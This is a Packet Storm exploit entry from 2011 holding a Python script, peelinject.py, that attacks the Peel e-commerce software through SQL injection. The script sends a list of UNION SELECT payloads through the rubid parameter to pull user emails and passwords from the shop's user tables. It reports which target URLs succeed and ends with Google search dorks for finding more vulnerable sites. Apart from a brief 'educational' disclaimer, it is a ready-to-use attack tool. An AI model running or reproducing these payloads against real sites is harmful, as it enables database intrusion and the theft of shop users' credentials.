Peel E-Commerce / Shopping SQL Injection

2011-02-22T00:00:00
ID PACKETSTORM:98646
Type packetstorm
Reporter baltazar
Modified 2011-02-22T00:00:00

Description

                                        
                                            `#!/usr/bin/python  
# This was written for educational purpose and pentest only. Use it at your own risk.  
# Author will be not responsible for any damage!  
# !!! Special greetz for my friend sinner_01 !!!  
# Toolname : peelinject.py  
# Coder : baltazar a.k.a b4ltazar < b4ltazar@gmail.com>  
# Version : 0.1  
# greetz for d3hydr8, rsauron, low1z, qk, marezzi, StRoNiX, t0r3x and all members of ex darkc0de.com and ljuska.org  
# More vuln in next version  
# So many vuln sites to find :)  
#   
  
  
import sys, os, re, time, urllib2  
  
if sys.platform == 'linux' or sys.platform == 'linux2':  
clearing = 'clear'  
else:  
clearing = 'cls'  
os.system(clearing)  
  
def logo():  
print "\n|---------------------------------------------------------------|"  
print "| b4ltazar[@]gmail[dot]com |"  
print "| 02/2011 peelinject.py v.0.1 |"  
print "| |"  
print "|---------------------------------------------------------------|"  
  
if len(sys.argv) !=2:  
logo()  
print "\nEx: ./peelinject.py http://www.site.com/\n"  
sys.exit(1)  
  
vulnsql = ["lire/index.php?rubid=1+union+all+select+0,concat_ws(char(58),email,mot_passe,0x62616c74617a6172),2+from+peel_utilisateurs--", "lire/index.php?rubid=1+union+all+select+concat_ws(char(58),email,mot_passe,0x62616c74617a6172),1,2+from+peel_utilisateurs--", "lire/index.php?rubid=1+and+1=2+union+all+select+concat_ws(char(58),email,mot_passe,0x62616c74617a6172),1,2,3+from+jld_utilisateurs--", "lire/index.php?rubid=1+union+all+select+0,concat_ws(char(58),email,mot_passe,0x62616c74617a6172)+from+peel_utilisateurs--", "lire/index.php?rubid=1+union+all+select+0,concat_ws(char(58),email,mot_passe,0x62616c74617a6172)+from+utilisateurs--", "index.php?rubid=1+union+all+select+0,concat_ws(char(58),email,mot_passe,0x62616c74617a6172),2+from+peel_utilisateurs--"]  
  
site = sys.argv[1]  
if site[:4] != "http":  
site = "http://"+site  
if site [-1] != "/":  
site = site + "/"  
  
logo()  
print "\n[-] %s" % time.strftime("%X")  
print "\n[+] Target:", site  
print "[+]",len(vulnsql),"Vulns loaded "  
print "[+] Starting scan ...\n"  
  
  
for sql in vulnsql:  
print "[+] Checking:" ,site+sql.replace("\n","")  
try:  
target = urllib2.urlopen(site+sql.replace("\n", "")).read()  
if re.findall("baltazar", target):  
print"[!] w00t!,w00t!: ",site+sql.replace("\n", "")  
print  
else:  
print "[-] Sorry, can't exploit :("  
print  
except(urllib2.HTTPError):  
pass  
except(KeyboardInterrupt, SystemExit):  
pass  
  
print "[!] Use this google dork for finding targets\n"  
print "\tinurl:lire/index.php?rubid="  
print "\tinurl:/index.php?rubid=\n"  
print "\n[-] %s" % time.strftime("%X")  
  
`